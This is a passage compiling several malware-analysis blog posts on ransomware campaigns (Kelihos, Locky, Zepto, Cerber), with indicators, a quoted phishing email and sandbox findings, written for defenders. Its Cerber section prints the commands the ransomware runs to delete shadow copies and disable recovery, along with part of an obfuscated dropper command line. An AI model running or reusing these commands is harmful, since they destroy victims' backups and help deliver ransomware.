Subject - Job opportunity - marquerite23894@aol[dot]com
Subject - Open vacancy - marquerite23894@aol[dot]com

The other thing to note is that all of the email addresses use AOL domains, which is a unique thing in itself.

To conclude, Kelihos has been surprising the researchers quite often and it has become necessary to keep track of different activities of the botnet. The ransomware inclusion brings interesting twists from the research as well as law enforcement. Another thing that I found while searching for NoMoreRansom was a group established by key leaders in the community to fight against the rise of ransomware. 

So is the extension of NoMoreRansom a challenge to the people fighting it? Who knows? 
FYI: Things are about to get interesting!

Cybercrime Surges in Q3

young man with glasses sitting in front of his computer, programming. the code he is working on (CSS) can be seen through the screen.

PandaLabs Q3 Report indicates that incidences of cybercrime continue to increase, with 18 million new malware samples captured this quarter – more than 200,000 samples daily.

The Quarter at a Glance

Cybercrime continues to grow at an exponential rate, fuelled by the opportunity for large financial rewards.

Hackers have taken to developing new variants of successful Ransomware such as Locky, and the development of a model known as Ransomware-as-a-Service (RaaS), whereby developers create Ransomware for distributors, these distributors then target and infect victims – allowing both parties to achieve greater profits.

Another key development was the occurrence of DDoS attacks. Most natably that of Cyber Security journalist Brian Krebs. Krebs exposure of vDoS lead to the arrest of its key members and subsequently made Krebs’ site the target of a massive DDoS attack that saw Google step in to restore the site. As one of the largest attack of its kind, hackers leveraged IoT devices to send 620GB of data per second – at its peak – to the site.
This quarter cyber-attacks targeted multiple gaming sites, gaining access to millions of users’ personal information. These attacks were largely launched using botnets composed of smartphones, and effected users of Overwatch, World of Warcraft and Diablo 3. Further attacks saw more than 3.5 million users exposed when Dota 2 and mobile game Clash of the Kings were targeted. These highlight just a few incidences in the Gaming world in the last 3 months.

The Banking sector remained a target for hackers as attacks on ATM’s, POS terminals and Bitcoin wallets continue to become more frequent and more advanced.

A Taiwanese ATM attack this quarter indicated just how advanced cybercriminals have become when they were able to hack the banks internal network and withdraw over R28 million without even touching the ATM itself.

Another big victim was Yahoo – one of the biggest attacks of its kind revealed this quarter indicated that 500 million user accounts had been comprised in a 2014 attack.

Finally, Q3 saw the largest Bitcoin robbery to date, when R 84 billion worth of Bitcoin was stolen by hackers.

View the full PandaLabs Q3 Report for more detail on specific attacks and find out how you can protect yourself and your business from the advanc

The post Cybercrime Surges in Q3 appeared first on

Evolution of Locky – A Cat & Mouse Game


In the on-going game of cat and mouse between cyber attackers and defensive internet security providers, the appearance of a new tactic from the Locky family of Ransomware comes as no surprise.

As we discussed in February this year, Locky targets victims through seemingly legitimate email attachments. Once the victim clicks on the attachment the malicious macro begins encrypting the users’ files.

Given the nature of this environment, security experts are constantly working on ways to stop Locky, coming up with solutions that will render it ineffective.

Distribution of the latest attack

In the latest development, cyber attackers have come up with new tactics to bypass security. The malware is still distributed via email attachments, but no longer uses a Trojan. These emails have varying names and subject lines to attract the victims’ attention and usually contain Zip files.

The Malware skips the downloader Trojan and gets the Locky variant in DLL format, and is then executed using Windows rundll32.exe. By using a script file as well as a DLL, instead of a Trojan and .exe, Locky is not immediately detected and blocked, and the Ransomware can begin its course.

To further ensure its success cyber attackers have given Locky an added fall-back mechanism, this means that the malware will still be able to complete its actions even in cases where it can’t reach command and control servers. The weak point in this is that the encryption key is the same for every computer.

These attacks appear to present in weekly waves and have already targeted victims in North and South America, and Europe, as well as attacks in Africa and Asia.


In order to protect yourself, security experts suggest setting up filters for script files that arrive via email, as well as ensuring your antivirus is up to date. Advanced solutions such as Panda’s Adaptive Defence allow for active classification of every running application by leveraging Endpoint Detection & Response (EDR) technologies. This means that you have a greater chance of defending your network against today’s advanced threats.

The post Evolution of Locky – A Cat & Mouse Game appeared first on

Amazon Gift Card from Kelihos!

Arsh Arora and Max Gannon, malware researchers in our lab at the University of Alabama at Birmingham (UAB) continue their on-going analysis of the Kelihos botnet.  We call this a "longitudinal malware study."  Today Arsh returns with some interesting observations about the Kelihos botnet as it sends out Amazon Gift Card. 

Arsh take it from here.

Amazon Gift Card from Kelihos botnet! Anyone up for a Nymaim banking trojan or CryptoLocker?

Here it is, the Kelihos botnet back with a bang. Today, Kelihos is in a festive mood and giving away a free “Amazon Gift Card”, especially for US customers.  Instead of ALL American spam recipients receiving the malware, however, only those whose email ends in the country code ".us" received this malware.  As you can see in the sample list below, this means that many school employees will have received this spam, as K-12 schools very commonly use .us domain names.

This is the first time it has geo-targeted US customers, unlike previous occasions where it had targeted Canadian [Canada] , German and UK, [German and UK] and Dutch [Dutch] customers. The delivery mechanism is the same in which the botnet delivers emails containing suspicious links to a Microsoft Word document that will download a Nullsoft installer and eventually affect you with Nymaim/CryptoLocker.

Now, we can surely say that the operators of Kelihos botnet are formulating a strategy in choosing their targets for the spam campaign. Basically, they are trying to gain back the attention of the industry and trying to proclaim its spot of the longest surviving spamming botnet. Recently, the botnet size increased tremendously and has been a hot topic among the cyber industry.

Geo Targeted emails to US based victims
The body of the message sent contains a malicious word doc link

Subject: Amazon Gift Team just wants to make a present for you

Hi our beloved client!
Our company glad to notify, that our improbable promotion special offer to say thanks to limited number of our buyers.
In this greetings list you can find costless Amazon Gift Card for $65 balance!!! It can be redeemed in our online webstore for any further purchase on Amazon. You can activate promo eGift using this link: hxxp://amazon[.]com[.]yougifted[.]pw/Amazon%20Gift%20Code[dot]doc
Hurry up! This offer have limited time, and limited number of promo vouchers available, that can be activated during promo, so do not forget to obtain your one! 
Huge thanks from Amazon for being a part of our team, we really apreciate that!
You can discover useful information using our FAQ on or via the phone +180012343212
Amazon Promo Team


The most common email subjects we observed being used in the spam campaign are:
Subject: Amazon Gift Team just wants to make a present for you
Subject: Awesome news! You recieved a gift from Amazon!
Subject: Don't wait, get free voucher! Amazon Promo chosen you!
Subject: Gift from Amazon was just recieved, redeem yours now

The URLs  sent in the email are presented below with its corresponding resolved IP address, via WHOIS search

hxxp://[.]pw/Amazon%20Gift%20Code[dot]doc – 104[.]168[.]181[.]99; Oklahoma
hxxp://[.]pw/Amazon%20Gift%20Code[dot]doc – 104[.]168[.]181[.]99
hxxp://[.]pw/Amazon%20Gift%20Code[dot]doc – 149[.]202[.]194[.]178; Nord-pas-de-calais
hxxp://[.]pw/Amazon%20Gift%20Code[dot]doc - 149[.]202[.]194[.]178
hxxp://[.]pw/Amazon%20Gift%20Code[dot]doc – 198[.]105[.]215[.]36; Utah

An interesting observation is that 4 out of 5 Urls share the same Whois contact information[Whois]

Registrant Name: Frank Gilmer
Registrant Organization: Private Person
Registrant Street: 22 Bakinskih komissarov 2k1, 51
Registrant City: Moscow
Registrant State/Province: Moscow
Registrant Postal Code: 119571
Registrant Country: RU
Registrant Phone: +7.9681673922
Registrant Email:

Moving on, the delivery mechanism remains to consistent as seen on previous occasions

Document opened in Protected view with a URL link

After downloading the Word document and viewing its content, it shows the above message. Interestingly, it contains a URL that is meant to excite the victim. So in order to receive this “amazing” offer, the user first has to press the “Enable Editing” button.

Enable Content AKA Encrypt Me!

 After clicking the 'Enable Editing' button, another window asks to 'Enable Macros', aka  "ENCRYPT ME" button. The gift card is still unavailable and can be only be retrieved after clicking the URL in the email.

Congratulating the user!

This behavior has been seen for the first time where the user is asked to click a URL.  While the user is occupied trying to find his/her gift code, the ransomware is performing its task in the background. By the time the user realizes a scam is underway, the machine is already encrypted. Threat actors have perfectly social engineered user behavior in order to succeed in causing damage to the user.

The URL provided in the email doesn't actually exist at Amazon:

Too late to say Sorry!

When the link is clicked, we get Amazon's 404 page -- an image of a cute dog and a message saying “Sorry, we couldn’t find that page”. On the contrary, guess what happens? When you close the browser you will find that your files are encrypted. Unfortunately, we were not able to get our system encrypted as the installer checked registry keys for the presence of the virtual environment.

After not being able to accomplish my mission, I checked virus total for extra information

MD5 of the Word Document - 2843a3b7805ffc7fd058b9fd744ec836 [VT result]

Of course, the Word document was a downloader, but the file that was download was indeed malicious.

MD5 of the NSIS installer named 'Sys_Driver' - 766169d508d0eee096e07619c2a1416a [VT results]

VT results 10/57, CryptoLocker

When we reviewed the malicious file on Virus Total, contradicting results were found. On one side, the AV vendors classified it as Cryptolocker. On the contrary, when I checked the comments section, one user has posted it to be Nymaim.  We believe this is due to targeting, where the same URL may drop different malware depending on the visitor.  Hence, I thought to probably avoid getting into the discussion of who is right, and leave it up to the discretion of the user to pick his side.

#Nymaim in the comments section
While CryptoLocker is unlikely - it hasn't been seen in some time - we don't want to contradict the AV vendors until we can execute the malware ourselves.   

As of now, my colleague Max Gannon, Malware Analyst at UAB, notes that these samples are extraordinarly VM-aware.  It performs the usual registry check for references to Virtualization Software, but it also checks the display adapters and color settings which are harder to disguise and less frequently modified by malware analysts.  It checks the local machine language as well as the keyboard layout which is again not frequently changed.  It checks the clipboard contents and if the clipboard is linked to a Virtual Machine.  Lastly it checks the system for a pre-defined set of programs that it considers indicative of a normal system.  This is a significant increase in the number of checks when compared to similar malware families and may require additional focus and analysis time.

Hopefully, this will widen up the eyes of Amazon and the individuals who have the authority to take action. Eventually, taking appropriate measures to cause damage to the threat actors. Beware American friends.

Stay tuned for latest updates on the Kelihos botnet in the coming future.

Zepto Evasion Techniques

We’ve been tracking some more spam dropping Zepto ransomware variants. Like earlier posts, we’re seeing infected attachments with malicious macro scripts used as the entry point for the threat actor. (See images below of some recent spam samples.)

Zepto spam

As we dig deeper into our analysis, we found out that these macro scripts are not crafted manually. The malware authors have automated the creation and obfuscation of their code. This type of random obfuscation is one way of evading antivirus engines. As outlined below, our research highlights several methods employed to dynamically evolve the attack vector to circumvent detection.

From the malicious emails we have gathered, we will examine the attachments to analyze key differences and common characteristics.

The malicious code was written and spread across the 3 sub modules:

zepto automation

5 sub modules are being used for the malicious code:

zepto obfuscation

Examining the sub modules of the file shows that it has some common signatures that we can look for:

zepto codezepto hidden code

We were able to find blocks of code that shares common structures. Remember that these codes were found on a different part or index of the module. From programmer’s perspective, this may seem a little odd to see codes like this, but as the analysis continues, we can say that this is just one part of the malware author’s strategy to hide the code and confuse incident responders.

Notice the highlighted strings from both screenshots that are common across the two samples. At first glance, some significant strings can be formed only if the garbage strings such as:

  • “RIIM”
  • “PORKKI”

were removed or replaced, they can be formed as:

  • “microsoft”
  • “”
  • “script”
  • “application”

Additionally, and maybe more significant, is the activity of these scripts. You will also notice the highlighted strings are surrounded by what we can now assume are garbage code for misdirection and to further obfuscate malicious code.

Basically, the usual flow of the scripts analyzed will go like this:

zepto infection process

At this point, the payload of the downloaded Zepto ransomware will take over.

As observed with the Zepto downloaders, the scripts also varies with the encrypted URLs. Below are some of the URLs from which the monitored scripts attempted to download Zepto. Imagine how many of them are generated and how many various structured scripts are available in the wild. Zepto is not only distributed through macro scripts, there are also JavaScrip and wsf script downloaders.

zepto download links

With some twists of social engineering, creativity and advanced programming skills, cybercriminals are becoming increasingly adept at delivering Zepto and other ransomware payloads to both business and home users.

zepto infection screen

Prevent Ransomware Infections?

To prevent ransomware, we recommended you block it early from the root of its infection chain. Here are some tips:

  • Always keep your operating system, applications and security products patched and up to date
  • Take precaution when opening attachments, especially when sent by an unknown sender
  • Never enable VBA macros by default for any Microsoft Office application. Some macro malwares even tell you how to enable macros or may mislead you in doing so.
  • Deploy solutions that protect you from sophisticated and pervasive threats like ransomware, including advanced endpoint protection like VIPRE Endpoint Security, a malware behavior analysis tool like ThreatAnalyzer, and solutions to detect and disrupt active cyber attacks like ThreatSecure
  • Regularly back up your data

VIPRE Antivirus Detections for this threat include:

  • (v)
  • Trojan-Downloader.O97M.Donoff.bu (v)
  • OLE.Generic.a (v)



Zepto Ransomware Packed into WSF Spam

Analysis by Daryl Tupaz

The post Zepto Evasion Techniques appeared first on ThreatTrack Security Labs Blog.

Donoff Macro Dropping Ransomware

Recently, we’ve spotted Zepto ransomware spreading through spam email containing fake invoices (see image below). These attachments contain a Macro-Enabled word document file known as Donoff, which downloads the Zepto executable that encrypts all your files and will later ask for payment of the decryption key.

donoff malicious macro sample

We decided to take a closer look on the Donoff macro used in downloading the Zepto ransomware. Here’s what we found:

The VBA Macro code

At first glance, the code is fully commented in Spanish and uses some random generated variable names.

Here a look at the code:

donoff macro code

Retrieving Zepto

The Word document contains two macro functions, autoopen and ActualizarEntrada.

donoff spanish code

Here are more snips of code showing the processing of obfuscated text.

donoff macro code

These are the strings revealed after deobfuscation.

  • streaM
  • Application
  • shell
  • Process
  • GeT
  • TeMP
  • Type
  • open
  • write
  • responseBody
  • savetofile
  • \sysdrubpas.exe

This VBScript uses Microsoft.XMLHTTP and Adodb.Stream Objects to download Zepto.

The Microsoft.XMLHTTP object is one of Microsoft’s XML DOM (Document Object Model) modules that is intended to deliver client-side access to XML documents on remote servers through the HTTP protocol.  This object is used to request or send any type of document.

The ADODB.Stream Object is used to read, write and manage a stream of binary data or text.


The following code decrypts to



Here’s the code that downloads the encrypted Zepto executable file.


The encrypted file is stored to the file system as TempWFDSAdrweg.  It then uses this key Aw3WSr7dB3RlPpLVmGVTtXcQ3WG8kQym to decrypt and stores the decrypted binary to the file sysdrubpas.exe in the %temp% folder.  %temp% folder is usually the C:\Users\<username>\AppData\Local\Temp folder.


Decryption code


Encrypted Zepto (Displayed here in Hexadecimals):

encrypted zepto

Decrypted Zepto (now in Executable form):

decrypted zepto

The script then executes sysdrubpas.exe infecting the system of the user.


ThreatAnalyzer – Malware Sandbox Analysis

When executed in our malware analysis sandbox ThreatAnalyzer, here’s the process tree caused by the malicious Word document

donoff analysis

The ThreatAnalyzer Behavioral Determination Engine flags this as 100% malicious file and was able to find dozens of suspicious behaviors.donoff processes

One notable common behavior of ransomware is how it deletes shadow copies to prevent easy restoration from Windows backup.


Other behaviors are very similar to our previous post about Zepto ransomware:

Prevent Ransomware Infections?

To prevent ransomware, we recommended you block it early from the root of its infection chain. Here are some tips:

  • Always keep your operating system, applications and security products patched and up to date
  • Take precaution when opening attachments, especially when sent by an unknown sender
  • Never enable VBA macros by default for any Microsoft Office application. Some macro malwares even tell you how to enable macros or may mislead you in doing so.
  • Deploy solutions that protect you from sophisticated and pervasive threats like ransomware, including advanced endpoint protection like VIPRE Endpoint Security, a malware behavior analysis tool like ThreatAnalyzer, and solutions to detect and disrupt active cyber attacks like ThreatSecure
  • Regularly back up your data


e98aee56175daaa96f259d04077d820f – malicious DOC attachment ( (v))

837a5b0dbd5850634bfecadadc751cdd – Zepto executable (Trojan.Win32.Generic!BT)

Analysis by Wilmina Elizon

The post Donoff Macro Dropping Ransomware appeared first on ThreatTrack Security Labs Blog.

Zepto Ransomware Packed into WSF Spam

ThreatTrack Labs has recently observed a surge of spam containing a zip attachment with a WSF (Windows Scripting File) to deliver Zepto ransomware. This tactic is a change from the common JavaScript and macro documents being spammed previously.

Here are actual emails featuring familiar social engineering tactics:

ransomware spam infected WSF attachment

ransomware spam infected WSF attachment

ransomware spam infected WSF attachment

The zip attachments contain the WSF.

infected WSF file


An Interactive Analysis with ThreatAnalyzer

To see what we’re dealing with, we turned to ThreatTrack’s malware analysis sandbox ThreatAnalyzer.

We extracted the WSF, submitted it to ThreatAnalyzer and generated the following threat analysis:

Zepto ransomware analysis

Since this is a script, we are more concerned with the call tree from WScript.exe. One notable result, encircled above, is the number of modified files. This most indicates a high likelihood that this could either be a virus or ransomware. And considering the proliferation of ransomware attacks lately, that’s our biggest concern.

There are two captured screen shots from our analysis.

Zepto ransomware analysis infection screen

Expanding the MODIFIED FILES shows this result.

ransomware modified files

The files affected are renamed with a “.zepto” filename extension.

Given the screenshot and Modified Files artifacts, we can confidently say that this is a variant of the Zepto ransomware.

The WSF Script Behavior

Selecting C:\Windows\System32\WScript.exe (3388) shows results of the behaviors done by the WSF alone.

ransomware sandbox analysis

ransomware sandbox analysis

It shows that the script created two files and made an HTTP connection to

Let’s look at the two files in the Temp folder.

This is the binary view of UL43Fok40ii file

Zepto ransomware encrypted code

This is the UL43Fok40ii.exe file.  A complete PE file format.

ransomware code processes analysis

Having only a difference of 4 bytes in size of 208,008 bytes and 208,004 bytes suggests that the file without the .exe filename extension was decrypted to form the PE executable file. Afterwards, the PE executable was run by the WSF script with the argument: “321”.

ransomware sandbox analysis


Expanding the Network connections.

ransomware sandbox analysis

ransomware sandbox analysis

With the suffix from the resolved host, the server seems to be located in Malaysia.

The HTTP header also indicates that the Content-Length was 208,008 bytes. This is the same file size of the encrypted file.

The WSF file executed by the WScript.exe simply downloaded then decrypted a Windows PE file then executed it.

The Downloaded Executable PE file

Now we turn our focus on the behavior of the executable file UL43Fok40ii.exe.

Zepto ransomware sandbox analysis

  • Posted some info to a server somewhere in Ukraine.
  • Accessed hundreds of files.
  • Executed the default browser (Chrome was set as the default browser)
  • Deleted a file using cmd.exe

ransomware sandbox analysis

  • Connected to shares
  • Dropped the ransom instructions (_HELP_instructions.html). For every folder where a file got encrypted for ransom, a copy of the _HELP_instructions.html is created.

ransomware sandbox analysis help me

  • Created 10 threads

The data posted to the Ukraine site is encrypted. Most likely this contains the id and key used to encrypt the files.


TA displays the raw data in hexadecimal form. A partially converted version of the raw data is shown below:



This malware also renamed a lot of files. This is the behavior that encrypts files while renaming the file using a GUID filename with a “.zepto” filename suffix.


In the manner of searching files, it primarily targets the phone book file before traversing from the root directory of the drive.


Also some notable files that were created. The captured screenshot is the contents of the _HELP_instructions.bmp file.


This malware sample attempts to move its running executable to a file in the Temp folder.


With Chrome set as the default browser,  the malware opens the file _HELP_instructions.html that it previously created in the Desktop.  It also, deletes the malware copy from the Temp folder probably a part of it’s clean up phase.


Here’s what _HELP_instructions.html looks like when opened in a browser.


The process call tree under Chrome.exe are most likely invoked by the browser and not part of this malware.

Prevent Ransomware

Syndicates behind today’s ransomware like Zepto are aggressively finding various ways of infiltrating businesses and government organizations alike. In this case, they attacked by using Windows Scripting Files in hopes to pass through email gateways that don’t block WSF files in attachments.

To protect your organization, deploy solutions that protect you from sophisticated and pervasive threats like ransomware, including advanced endpoint protection like VIPRE Endpoint Security, a malware behavior analysis tool like ThreatAnalyzer, and solutions to detect and disrupt active cyber attacks like ThreatSecure. And regularly back up all your critical data.

VIPRE antivirus detections for this threat include Trojan.Locky.AX and Trojan.Win32.Generic!BT.

The post Zepto Ransomware Packed into WSF Spam appeared first on ThreatTrack Security Labs Blog.

Cerber: Analyzing a Ransomware Attack Methodology To Enable Protection

Ransomware is a common method of cyber extortion for financial gain that typically involves users being unable to interact with their files, applications or systems until a ransom is paid. Accessibility of cryptocurrency such as Bitcoin has directly contributed to this ransomware model. Based on data from FireEye Dynamic Threat Intelligence (DTI), ransomware activities have been rising fairly steadily since mid-2015.

On June 10, 2016, FireEye’s HX detected a Cerber ransomware campaign involving the distribution of emails with a malicious Microsoft Word document attached. If a recipient were to open the document a malicious macro would contact an attacker-controlled website to download and install the Cerber family of ransomware.

Exploit Guard, a major new feature of FireEye Endpoint Security (HX), detected the threat and alerted HX customers on infections in the field so that organizations could inhibit the deployment of Cerber ransomware. After investigating further, the FireEye research team worked with security agency CERT-Netherlands, as well as web hosting providers who unknowingly hosted the Cerber installer, and were able to shut down that instance of the Cerber command and control (C2) within hours of detecting the activity. With the attacker-controlled servers offline, macros and other malicious payloads configured to download are incapable of infecting users with ransomware.

FireEye hasn’t seen any additional infections from this attacker since shutting down the C2 server, although the attacker could configure one or more additional C2 servers and resume the campaign at any time. This particular campaign was observed on six unique endpoints from three different FireEye endpoint security customers. HX has proven effective at detecting and inhibiting the success of Cerber malware.

Attack Process

The Cerber ransomware attack cycle we observed can be broadly broken down into eight steps:

  1. Target receives and opens a Word document.
  2. Macro in document is invoked to run PowerShell in hidden mode.
  3. Control is passed to PowerShell, which connects to a malicious site to download the ransomware.
  4. On successful connection, the ransomware is written to the disk of the victim.
  5. PowerShell executes the ransomware.
  6. The malware configures multiple concurrent persistence mechanisms by creating command processor, screensaver, and runonce registry entries.
  7. The executable uses native Windows utilities such as WMIC and/or VSSAdmin to delete backups and shadow copies.
  8. Files are encrypted and messages are presented to the user requesting payment.

Rather than waiting for the payload to be downloaded or started around stage four or five of the aforementioned attack cycle, Exploit Guard provides coverage for most steps of the attack cycle – beginning in this case at the second step.

The most common way to deliver ransomware is via Word documents with embedded macros or a Microsoft Office exploit. FireEye Exploit Guard detects both of these attacks at the initial stage of the attack cycle.

PowerShell Abuse

When the victim opens the attached Word document, the malicious macro writes a small piece of VBScript into memory and executes it. This VBScript executes PowerShell to connect to an attacker-controlled server and download the ransomware (profilest.exe), as seen in Figure 1.

Figure 1. Launch sequence of Cerber – the macro is responsible for invoking PowerShell and PowerShell downloads and runs the malware

It has been increasingly common for threat actors to use malicious macros to infect users because the majority of organizations permit macros to run from Internet-sourced office documents.

In this case we observed the macrocode calling PowerShell to bypass execution policies – and run in hidden as well as encrypted mode – with the intention that PowerShell would download the ransomware and execute it without the knowledge of the victim.

Further investigation of the link and executable showed that every few seconds the malware hash changed with a more current compilation timestamp and different appended data bytes – a technique often used to evade hash-based detection.

Cerber in Action

Initial payload behavior

Upon execution, the Cerber malware will check to see where it is being launched from. Unless it is being launched from a specific location (%APPDATA%\&#60GUID&#62), it creates a copy of itself in the victim's %APPDATA% folder under a filename chosen randomly and obtained from the %WINDIR%\system32 folder.

If the malware is launched from the specific aforementioned folder and after eliminating any blacklisted filenames from an internal list, then the malware creates a renamed copy of itself to “%APPDATA%\&#60GUID&#62” using a pseudo-randomly selected name from the “system32” directory. The malware executes the malware from the new location and then cleans up after itself.

Shadow deletion

As with many other ransomware families, Cerber will bypass UAC checks, delete any volume shadow copies and disable safe boot options. Cerber accomplished this by launching the following processes using respective arguments:

Vssadmin.exe "delete shadows /all /quiet"

WMIC.exe "shadowcopy delete"

Bcdedit.exe "/set {default} recoveryenabled no"

Bcdedit.exe "/set {default} bootstatuspolicy ignoreallfailures


People may wonder why victims pay the ransom to the threat actors. In some cases it is as simple as needing to get files back, but in other instances a victim may feel coerced or even intimidated. We noticed these tactics being used in this campaign, where the victim is shown the message in Figure 2 upon being infected with Cerber.

Figure 2. A message to the victim after encryption

The ransomware authors attempt to incentivize the victim into paying quickly by providing a 50 percent discount if the ransom is paid within a certain timeframe, as seen in Figure 3.



Figure 3. Ransom offered to victim, which is discounted for five days

Multilingual Support

As seen in Figure 4, the Cerber ransomware presented its message and instructions in 12 different languages, indicating this attack was on a global scale.

Figure 4.   Interface provided to the victim to pay ransom supports 12 languages


Cerber targets 294 different file extensions for encryption, including .doc (typically Microsoft Word documents), .ppt (generally Microsoft PowerPoint slideshows), .jpg and other images. It also targets financial file formats such as. ibank (used with certain personal finance management software) and .wallet (used for Bitcoin).

Selective Targeting

Selective targeting was used in this campaign. The attackers were observed checking the country code of a host machine’s public IP address against a list of blacklisted countries in the JSON configuration, utilizing online services such as to verify the information. Blacklisted (protected) countries include: Armenia, Azerbaijan, Belarus, Georgia, Kyrgyzstan, Kazakhstan, Moldova, Russia, Turkmenistan, Tajikistan, Ukraine, and Uzbekistan.

The attack also checked a system's keyboard layout to further ensure it avoided infecting machines in the attackers geography: 1049—Russian, ¨ 1058—Ukrainian, 1059—Belarusian, 1064—Tajik, 1067—Armenian, 1068—Azeri, (Latin), 1079—Georgian, 1087—Kazakh, 1088—Kyrgyz (Cyrillic), 1090—Turkmen, 1091—Uzbek (Latin), 2072—Romanian (Moldova), 2073—Russian (Moldova), 2092—Azeri (Cyrillic), 2115—Uzbek (Cyrillic).

Selective targeting has historically been used to keep malware from infecting endpoints within the author’s geographical region, thus protecting them from the wrath of local authorities. The actor also controls their exposure using this technique. In this case, there is reason to suspect the attackers are based in Russia or the surrounding region.

Anti VM Checks

The malware searches for a series of hooked modules, specific filenames and paths, and known sandbox volume serial numbers, including: sbiedll.dll, dir_watch.dll, api_log.dll, dbghelp.dll, Frz_State, C:\popupkiller.exe, C:\stimulator.exe, C:\TOOLS\execute.exe, \sand-box\, \cwsandbox\, \sandbox\, 0CD1A40, 6CBBC508, 774E1682, 837F873E, 8B6F64BC.

Aside from the aforementioned checks and blacklisting, there is also a wait option built in where the payload will delay execution on an infected machine before it launches an encryption routine. This technique was likely implemented to further avoid detection within sandbox environments.


Once executed, Cerber deploys the following persistence techniques to make sure a system remains infected:

  • A registry key is added to launch the malware instead of the screensaver when the system becomes idle.
  • The “CommandProcessor” Autorun keyvalue is changed to point to the Cerber payload so that the malware will be launched each time the Windows terminal, “cmd.exe”, is launched.
  • A shortcut (.lnk) file is added to the startup folder. This file references the ransomware and Windows will execute the file immediately after the infected user logs in.
  • Common persistence methods such as run and runonce key are also used.
A Solid Defense

Mitigating ransomware malware has become a high priority for affected organizations because passive security technologies such as signature-based containment have proven ineffective.

Malware authors have demonstrated an ability to outpace most endpoint controls by compiling multiple variations of their malware with minor binary differences. By using alternative packers and compilers, authors are increasing the level of effort for researchers and reverse-engineers. Unfortunately, those efforts don’t scale.

Disabling support for macros in documents from the Internet and increasing user awareness are two ways to reduce the likelihood of infection. If you can, consider blocking connections to websites you haven’t explicitly whitelisted. However, these controls may not be sufficient to prevent all infections or they may not be possible based on your organization.

FireEye Endpoint Security with Exploit Guard helps to detect exploits and techniques used by ransomware attacks (and other threat activity) during execution and provides analysts with greater visibility. This helps your security team conduct more detailed investigations of broader categories of threats. This information enables your organization to quickly stop threats and adapt defenses as needed.


Ransomware has become an increasingly common and effective attack affecting enterprises, impacting productivity and preventing users from accessing files and data.

Mitigating the threat of ransomware requires strong endpoint controls, and may include technologies that allow security personnel to quickly analyze multiple systems and correlate events to identify and respond to threats.

HX with Exploit Guard uses behavioral intelligence to accelerate this process, quickly analyzing endpoints within your enterprise and alerting your team so they can conduct an investigation and scope the compromise in real-time.

Traditional defenses don’t have the granular view required to do this, nor can they connect the dots of discreet individual processes that may be steps in an attack. This takes behavioral intelligence that is able to quickly analyze a wide array of processes and alert on them so analysts and security teams can conduct a complete investigation into what has, or is, transpiring. This can only be done if those professionals have the right tools and the visibility into all endpoint activity to effectively find every aspect of a threat and deal with it, all in real-time. Also, at FireEye, we go one step ahead and contact relevant authorities to bring down these types of campaigns.

Click here for more information about Exploit Guard technology.

A Look at the Cerber Office 365 Ransomware

Reports of a Zero-day attack affecting numerous Office 365 users emerged late last month (hat tip to the researchers at Avanan), and the culprit was a new variant of the Cerber ransomware discovered earlier this year. As with the other Zero-day threats that have been popping-up like mushrooms of late, the main methods of infection is through the use of Office macros.

This blog provides an analysis on the Cerber variant using traditional reverse-engineering and ThreatTrack’s newest version of our malware analysis sandbox, ThreatAnalyzer 6.1.

Analyzing Cerber

Reverse engineering in general, more often than not, requires that one gets a broad view as to what the target is doing. Whether you’re analyzing a malware sample or trying to figure what a function does from an obfuscated code, it is best to get the general “feel” of your target before narrowing down to the specifics.

ThreatAnalyzer is a sandbox that executes a program, file or URL in a controlled, monitored environment and provides a detailed report enabling the researcher or analyst to get a good look as to what the sample will do at run time. It is also worth noting that a sandbox is a good tool for generating Threat Intelligence to quickly get IOCs (Indicators of Compromise). The latest version of this sandbox, ThreatAnalyzer 6.1, has a built-in behavioral detection mechanism that enables users to see the general behavior of a sample and based on those particular set of behaviors, predict if the program in question is malicious or benign in nature.

Fig: ThreatAnalyzer’s unique behavior determination engine

Fig: ThreatAnalyzer’s unique behavior determination engine


Fig 1: ThreatAnalyzer 6.1 in action

Fig 1: ThreatAnalyzer 6.1 in action

Looking at the figure above, on the analysis screen, ThreatAnalyzer 6.1 has provided the following vital information on this particular sample:

  1. Determine that the sample is detected as malicious on 3 different fronts:
    1. ThreatIQ (our integrated threat intelligence server) observers the sample trying to beacon to blacklisted URLs
    2. The sample is detected by at least 1 or multiple antivirus engine(s)
    3. Based on the behavior that it performed, has a high probability that the sample is malicious
  2. Shows the researcher/user the changes in Registry, IO (File), Network attempts it made, and processes that it spawned
  3. Compacts all detailed information that it has gathered into a downloadable PDF or XML report. If a user chooses, he can download the archive which includes the detailed report, any significant files that was generated, screenshots of the windows spawned and a copy of the PCAP file if any network activities were logged

ThreatAnalyzer also provides a detailed report of the sample you analyzed in XML, JSON or PDF format. These reports contain the processes that were spawned, what files were modified, created or accessed, registries that were manipulated, objects that were created and any network connections that were made.

If we look further at the particular XML file of the sample we analyzed, we can gather the following activities:

  • Spawned WINWORD.EXE (normal since we fed a DOTM file), but the process tree shows that it spawned
    • Cmd.exe
    • Wscript.exe
  • Created a randomly named VBS file in %appdata%
    • %appdata%\15339.vbs
    • Cmd.exe /V /C set “GSI=%APPDATA%\%RANDOM%.vbs” (for %i in (“DIm RWRL” “FuNCtioN GNbiPp(Pt5SZ1)” “EYnt=45” “GNbiPp=AsC(Pt5SZ1)” “Xn1=52” “eNd fuNCtiON” “SUb OjrYyD9()”Seeded another cmd.exe calling the VBS file
  • Made an attempt to connect to
    • httx://
  • Made a randomly named .TMP in %appdata% and executed it
    • Hash: ee0828a4e4c195d97313bfc7d4b531f1

These are highly suspicious activities given that we were trying to analyze an Office document file. The behavior above cannot be classified as normal. So the next time you’re nervous on opening an attachment, even if it came from a person or organization you know, feed it to a sandbox like ThreatAnalyzer and have a look before running it on your production machine.

Good ol’ reverse engineering

Office 365 Enable Content

Office 365 Enable Content

Looking at how this ransomware was coded, it will not only infect Office 365 users but users of Office 2007 and above. The macro inside the Document_Open function will auto-execute once the malicious office attachment is opened. But this is also dependent on whether the macro settings is enabled or in earlier Office versions, security is set to low. And quite possibly in an attempt to slow down the analysis process and bypass traditional AV signatures, each iteration of this Cerber macro variant is obfuscated.

Auto-execution macro inside Cerber macro

Auto-execution macro inside Cerber macro

The macro will then proceed to the creation of a script located in %appdata%. The VBS is also obfuscated but luckily not encrypted. It is interesting to note a particular action that may or may not be an intended feature to bypass behavioral detection. It uses the Timer function to generate a random integer and compare it to a self-generated variable, all the while; this action will be the condition when code to download the cryptor component will ensue.

Using built in network features of VBS; it will attempt to connect to a remote server and attempt to download a particular file.


This may seem harmless as it is just a simple JPG file, right? Well, the VBS code also indicates that it will write whatever the contents of that file, save it to a .TMP in %appdata% and execute it. Although this technique has been used by other malware and dates back years ago, this seems interesting.

